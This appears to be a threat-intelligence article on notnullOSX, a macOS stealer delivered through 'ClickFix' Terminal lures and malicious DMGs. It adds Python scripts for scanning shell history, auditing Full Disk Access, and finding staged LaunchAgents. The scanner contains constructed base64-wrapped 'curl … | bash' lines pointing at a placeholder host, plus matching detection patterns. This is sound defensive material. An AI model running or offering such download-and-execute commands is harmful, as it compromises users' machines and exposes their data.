ClickFix Social Engineering Lets Attackers Deliver notnullOSX on macOS
Key Takeaways
- A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000.
- The malware employs social engineering via a “ClickFix” method or malicious DMG files to bypass macOS security and gain Full Disk Access.
- Developed by an individual known as 0xFFF, now operating as alh1mik, the stealer is highly targeted, with operators manually vetting victims through an affiliate panel.
- notnullOSX uses a modular design to steal various data, including cryptocurrency wallet details, browser credentials, messages, and can even replace legitimate hardware wallet applications.
- The source material assigns no CVE to “ClickFix”: it is a social engineering technique rather than a software vulnerability, so there is no patch to apply. The threat is active, and the defence is user vigilance plus detection of the technique itself.
A sophisticated new macOS information stealer, dubbed notnullOSX, has been identified, focusing its attacks on cryptocurrency investors holding over $10,000 in their digital wallets. Written in the Go programming language, this malware leverages two distinct infection vectors—a social engineering tactic referred to as “ClickFix” and the distribution of malicious Disk Image (DMG) files—to covertly compromise Apple Mac systems.
The operation behind notnullOSX is characterized by its precise targeting. Threat actors meticulously select each victim through a dedicated affiliate panel before initiating an attack, ensuring a high potential return on their efforts.
The Evolution of notnullOSX
The origins of notnullOSX trace back to 2022, when a developer known as 0xFFF first showcased an early version of a macOS stealer on underground hacking forums. Following a reported exit from the scene in 2023, allegedly due to a rival’s fabricated law enforcement tip, 0xFFF resurfaced in August 2024 under the new alias “alh1mik.” The individual issued an apology and began accepting preorders for a refined macOS stealer at a monthly subscription cost of $400. By 2026, this offering had materialized into the notnullOSX malware.
Researchers at Moonlock Lab recorded the first detections of notnullOSX on March 30, 2026, observing activity in Vietnam, Taiwan, and Spain. Their analysis confirmed the malware’s highly targeted nature. Before any attack, operators are required to submit a form detailing the victim’s social media profiles, cryptocurrency wallet addresses, and communication history. Submissions for victims with wallet balances below $10,000 are automatically rejected.
Initial Infection Chains
The attack typically commences with a deceptive Google document, which presents an encryption error and prompts the victim to choose one of two actions, both ultimately leading to malware installation. The first method, “ClickFix,” instructs the user to open Terminal and paste a base64-encoded command. This command surreptitiously retrieves and executes a remote bash installer script. The second approach involves a malicious DMG disk image, disguised as a routine file with a README, an installation script, and a Terminal shortcut. In both scenarios the victim performs the download and execution from Terminal themselves, so the files never carry the quarantine attribute that would trigger Gatekeeper, and the malware is installed without any security alert.
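The ClickFix step above amounts to a base64-wrapped “download a script and pipe it to a shell” one-liner. The Python script below is an added example, not code from the report or from any vendor tooling: it shows how a responder can scan shell-history lines for that pattern by decoding base64-looking tokens and flagging commands that fetch a remote script and feed it to a shell. The sample history and the encoded payload are constructed for this example; the hostname is a placeholder and the real notnullOSX command is not reproduced.

```python
import base64
import binascii
import re
import shlex

# Constructed sample payload: a stand-in for the remote installer fetch,
# NOT the real notnullOSX command. The hostname is a placeholder.
PAYLOAD = "curl -fsSL https://example.invalid/install.sh | bash"
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()

# Constructed shell-history lines; two of them are ClickFix-style.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    f"echo {ENCODED} | base64 -d | bash",
    "git status",
    f"base64 -D <<< {ENCODED} | sh",
    "brew upgrade",
]

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b")
SHELL_SINK = re.compile(r"\|\s*(ba|z)?sh\b")


def decoded_tokens(line):
    """Yield (token, text) for each base64-looking token that decodes to UTF-8."""
    try:
        tokens = shlex.split(line)
    except ValueError:
        tokens = line.split()
    for tok in tokens:
        if not B64_TOKEN.match(tok):
            continue
        try:
            yield tok, base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue


def analyze_command(line):
    """Return a finding dict for a ClickFix-style one-liner, or None."""
    if REMOTE_EXEC.search(line):
        return {"reason": "remote script piped to shell", "decoded": None}
    for _tok, text in decoded_tokens(line):
        if REMOTE_EXEC.search(text):
            return {"reason": "base64-wrapped remote script execution", "decoded": text}
        if SHELL_SINK.search(line):
            return {"reason": "base64 payload piped to shell", "decoded": text}
    return None


def scan_history(lines):
    """Run analyze_command over history lines; return findings with line numbers."""
    findings = []
    for i, line in enumerate(lines):
        finding = analyze_command(line)
        if finding:
            finding.update(line_no=i, command=line)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line_no']}: {f['reason']}")
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

On a real Mac the lines would come from ~/.zsh_history; zsh’s extended history prefixes each entry with `: <epoch>:<elapsed>;`, which should be stripped before calling analyze_command. The decoded text is also what you would search for C2 hostnames.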
The distribution infrastructure for notnullOSX extends to a fake product page for a wallpaper application named WallSpace, hosted at wallpapermacos[.]com. This page features professional screenshots and a prominent “free download” button. Furthermore, a long-dormant YouTube channel, inactive since 2015, was hijacked to promote the fake app. A single video on this channel garnered 50,000 views in just two weeks, suggesting either paid promotion or sophisticated SEO manipulation.
Inside the Attack: TCC Bypass and Modular Data Theft
A critical aspect of notnullOSX’s danger lies in its ability to subvert macOS’s native permission system. Apple’s Transparency, Consent, and Control (TCC) framework prompts the user whenever an application attempts to access sensitive data such as Messages, Notes, or browser cookies. notnullOSX does not exploit a flaw in TCC; it talks the victim into granting the application “Full Disk Access” in System Settings.
That single permission covers every file-backed TCC category (the Messages and Notes databases, browser cookies and history, and the other protected folders under ~/Library), so the malware reads all of them without another prompt. It does not cover camera, microphone, or screen-recording prompts, but none of those matter to a stealer. The malware employs a modular architecture, downloading a specific binary from its command-and-control (C2) server for each data exfiltration task. Identified modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.
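Because Full Disk Access is the one grant the whole attack depends on, the useful host check is an audit of who currently holds it. The Python script below is an added example, not code from the report: it queries the system TCC database for kTCCServiceSystemPolicyAllFiles rows whose auth_value marks them as allowed and reports any client not on an allowlist. Reading the real database itself requires the reading process to hold Full Disk Access (root alone is not enough); the column names and the allowed value of 2 reflect the macOS 11+ schema as I know it and are stated as assumptions. The in-memory sample database, the allowlist, and the client paths are constructed for this example.

```python
import sqlite3

# System-wide TCC database; Full Disk Access grants live here, not in the per-user copy.
# The process reading it must itself hold Full Disk Access.
TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"
FDA_SERVICE = "kTCCServiceSystemPolicyAllFiles"
AUTH_ALLOWED = 2  # assumption: macOS 11+ schema, auth_value 0 = denied, 2 = allowed

# Assumed allowlist for this example: bundle IDs or absolute paths expected to hold FDA.
EXPECTED_FDA = {
    "com.example.edr-agent",
    "/usr/local/bin/backup-tool",
}


def open_tcc(path=TCC_DB):
    """Open the TCC database read-only."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def fda_clients(conn):
    """Return [(client, client_type)] currently allowed Full Disk Access."""
    rows = conn.execute(
        "SELECT client, client_type, auth_value FROM access WHERE service = ?",
        (FDA_SERVICE,),
    ).fetchall()
    return [(client, ctype) for client, ctype, auth in rows if auth == AUTH_ALLOWED]


def unexpected_fda(conn, allowlist=EXPECTED_FDA):
    """Clients holding Full Disk Access that are not on the allowlist."""
    return sorted(client for client, _ in fda_clients(conn) if client not in allowlist)


def sample_db():
    """Constructed stand-in for TCC.db, reduced to the columns this audit reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)"
    )
    conn.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?)",
        [
            (FDA_SERVICE, "com.example.edr-agent", 0, 2),       # expected, bundle ID
            (FDA_SERVICE, "/usr/local/bin/backup-tool", 1, 2),  # expected, absolute path
            # hypothetical path for a user-installed app that was granted FDA
            (FDA_SERVICE, "/Users/victim/Downloads/WallSpace.app/Contents/MacOS/WallSpace", 1, 2),
            (FDA_SERVICE, "com.example.denied", 0, 0),          # asked for FDA, denied
            ("kTCCServiceAppleEvents", "com.example.automation", 0, 2),  # different service
        ],
    )
    return conn


if __name__ == "__main__":
    # Against a live Mac, replace sample_db() with open_tcc().
    for client in unexpected_fda(sample_db()):
        print("Full Disk Access granted to unexpected client:", client)
```

In an EDR or MDM deployment the same query runs on a schedule and every new row for this service is an alert; a freshly downloaded app under ~/Downloads holding Full Disk Access is exactly the condition this report describes.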
The “ReplaceApp” module is particularly concerning. It silently substitutes legitimate hardware wallet applications, such as Ledger Live, with trojanized versions. These clones intercept the recovery seed phrase when the user is walked through setup, so even hardware-wallet users are exposed: the device keeps the private key off the Mac, but a seed phrase typed into a trojanized companion app is enough for the attacker to reconstruct the wallet elsewhere.
Beyond data theft, notnullOSX maintains a persistent WebSocket connection to a Firebase-hosted C2 server. It sends regular heartbeats and awaits remote commands, exhibiting behavior more akin to a full-fledged remote access trojan (RAT) than a simple, one-time information stealer.
What You Should Do
- For Security Teams: Block outbound connections to known C2 domains associated with notnullOSX. Alert on any unrecognized application being granted Full Disk Access. Monitor the /tmp directory for the staging of Mach-O binaries.
- For Mac Users and Cryptocurrency Holders: Never paste Terminal commands from untrusted sources, such as web pages or documents. Exercise extreme caution with any application that requests Full Disk Access during installation, especially if its origin is unclear. Regularly inspect ~/Library/LaunchAgents/ for any unfamiliar or suspicious entries.
- Practice General Cyber Hygiene: Keep your macOS operating system and all applications updated to the latest versions. Use strong, unique passwords and enable multi-factor authentication (MFA) wherever possible. Be wary of phishing attempts and suspicious links.
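Two of the host checks recommended above, Mach-O staging in /tmp and unfamiliar LaunchAgents, can be scripted. The Python below is an added example, not tooling from the report: it identifies Mach-O files by their magic bytes rather than by extension, and parses each LaunchAgent plist to report agents whose program lives outside the usual system and application paths. The sample tree, the fake binary, and the plists are constructed inside a temporary directory so the script runs offline; the trusted-prefix list is an assumption to tune per fleet.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# Mach-O magic numbers in both byte orders: 32-bit, 64-bit and fat/universal headers.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}
# Assumed "expected" locations for a LaunchAgent's program; tune per fleet.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/", "/Library/")


def is_macho(path):
    """True if the file starts with a Mach-O or fat-binary magic."""
    try:
        with open(path, "rb") as f:
            return f.read(4) in MACHO_MAGICS
    except OSError:
        return False


def find_machos(root="/tmp"):
    """Walk root and return every regular file carrying a Mach-O magic."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and is_macho(path):
                hits.append(path)
    return sorted(hits)


def program_of(plist):
    """Resolve what launchd will execute: Program wins over ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def suspicious_launch_agents(agents_dir=os.path.expanduser("~/Library/LaunchAgents")):
    """Return (plist path, Label, program) for agents whose program is outside TRUSTED_PREFIXES."""
    findings = []
    for plist_path in sorted(Path(agents_dir).glob("*.plist")):
        try:
            with open(plist_path, "rb") as f:
                plist = plistlib.load(f)
        except (OSError, plistlib.InvalidFileException, ValueError):
            continue
        program = program_of(plist)
        if program is None or not program.startswith(TRUSTED_PREFIXES):
            findings.append((str(plist_path), plist.get("Label"), program))
    return findings


def build_sample():
    """Constructed sample tree: a staged Mach-O in tmp/ and two LaunchAgents, one pointing at it."""
    root = tempfile.mkdtemp(prefix="notnull-audit-")
    tmp = os.path.join(root, "tmp")
    agents = os.path.join(root, "LaunchAgents")
    os.makedirs(tmp)
    os.makedirs(agents)
    staged = os.path.join(tmp, "stage.bin")
    with open(staged, "wb") as f:
        f.write(b"\xcf\xfa\xed\xfe" + b"\x00" * 60)  # 64-bit little-endian Mach-O magic only
    notes = os.path.join(tmp, "notes.txt")
    with open(notes, "w") as f:
        f.write("just text\n")
    with open(os.path.join(agents, "com.example.update.plist"), "wb") as f:
        plistlib.dump({"Label": "com.example.update", "ProgramArguments": [staged], "RunAtLoad": True}, f)
    with open(os.path.join(agents, "com.example.ok.plist"), "wb") as f:
        plistlib.dump({"Label": "com.example.ok", "Program": "/Applications/Example.app/Contents/MacOS/helper"}, f)
    return {"root": root, "tmp": tmp, "agents": agents, "staged": staged, "notes": notes}


if __name__ == "__main__":
    sample = build_sample()
    print("Mach-O in tmp:", find_machos(sample["tmp"]))
    for path, label, program in suspicious_launch_agents(sample["agents"]):
        print(f"review {label}: {program} ({path})")
```

Run against the real paths by calling find_machos() and suspicious_launch_agents() with their defaults; a LaunchAgent whose program resolves into /tmp or ~/Library is the persistence pattern worth pulling for analysis, and the file it points at is what the Mach-O check will usually catch first.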
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.